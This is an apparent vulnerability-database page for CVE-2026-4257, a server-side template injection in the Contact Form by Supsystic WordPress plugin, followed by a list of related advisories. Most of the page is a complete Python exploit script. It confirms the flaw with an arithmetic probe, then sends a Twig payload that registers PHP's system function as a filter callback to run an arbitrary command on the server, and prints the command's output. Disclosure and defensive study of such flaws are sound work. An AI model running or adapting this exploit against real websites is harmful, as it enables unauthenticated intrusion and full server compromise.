Lucene search
K

πŸ“„ Contact Form by Supsystic 1.7.36 Server-Side Template Injection

πŸ—“οΈΒ 11 May 2026Β 00:00:00Reported byΒ Groovy MarkTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstorm.newsπŸ‘Β 111Β Views

SSTS on Supsystic Contact Form 1.7.36 enables server-side template injection and remote command execution.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-4257
18 Apr 202619:39
–githubexploit
GithubExploit
Exploit for CVE-2026-4257
11 May 202605:24
–githubexploit
GithubExploit
Exploit for CVE-2026-4257
9 Jul 202608:02
–githubexploit
ATTACKERKB
CVE-2026-4257
30 Mar 202621:26
–attackerkb
Circl
CVE-2026-4257
30 Mar 202622:20
–circl
CNNVD
WordPress plugin Contact Form by Supsystic 代码注ε…₯漏洞
30 Mar 202600:00
–cnnvd
CVE
CVE-2026-4257
30 Mar 202621:26
–cve
Cvelist
CVE-2026-4257 Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
30 Mar 202621:26
–cvelist
Exploit DB
WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI
14 May 202600:00
–exploitdb
EUVD
EUVD-2026-17239
31 Mar 202600:31
–euvd
Rows per page
import requests
    import argparse
    import re
    import urllib.parse
    
    def check_ssti(url, field_name):
        print(f"[*] Testing SSTI on {url} with field {field_name}...")
        
        # Simple arithmetic test
        test_payload = "{{7*7}}"
        params = {
            "cfsPreFill": "1",
            field_name: test_payload
        }
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            response = requests.get(target_url, verify=False, timeout=10)
            if "49" in response.text:
                print("[+] SSTI confirmed! Found '49' in response.")
                return True
            else:
                print("[-] SSTI test failed. '49' not found in response.")
                return False
        except Exception as e:
            print(f"[-] Error: {e}")
            return False
    
    def trigger_rce(url, field_name, command):
        print(f"[*] Triggering RCE: {command}")
        
        # Payload to register system as a filter callback and then call it
        # We use forms.params.fields.1.value and fields.2.value to avoid quote escaping
        # last_name will be 'system', email will be the command
        payload = "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}{{_self.env.getFilter(forms.params.fields.2.value)}}"
        
        params = {
            "cfsPreFill": "1",
            field_name: payload,
            "last_name": "system",
            "email": command
        }
        
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            response = requests.get(target_url, verify=False, timeout=10)
            print(f"[*] Response Status: {response.status_code}")
            
            # Look for common patterns in the response that might indicate success
            # The output usually appears in the 'value' attribute of the first field
            match = re.search(r'name="fields\[' + field_name + r'\]" value="([^"]+)"', response.text)
            if match:
                print(f"[!] RCE SUCCESS! Output:")
                print(f"----------------------------------------")
                print(match.group(1))
                print(f"----------------------------------------")
                return True
            else:
                print("[-] Could not find command output in response. Check the response body manually.")
                return False
        except Exception as e:
            print(f"[-] Error: {e}")
            return False
    
    if __name__ == "__main__":
        print("""
    CVE-2026-4257
    Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
    
    -------------------------------------------------
        """)
        
        parser = argparse.ArgumentParser(description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)")
        parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
        parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
        parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
        
        args = parser.parse_args()
        
        if check_ssti(args.url, args.field):
            trigger_rce(args.url, args.field, args.cmd)

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 May 2026 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.41475
SSVC
111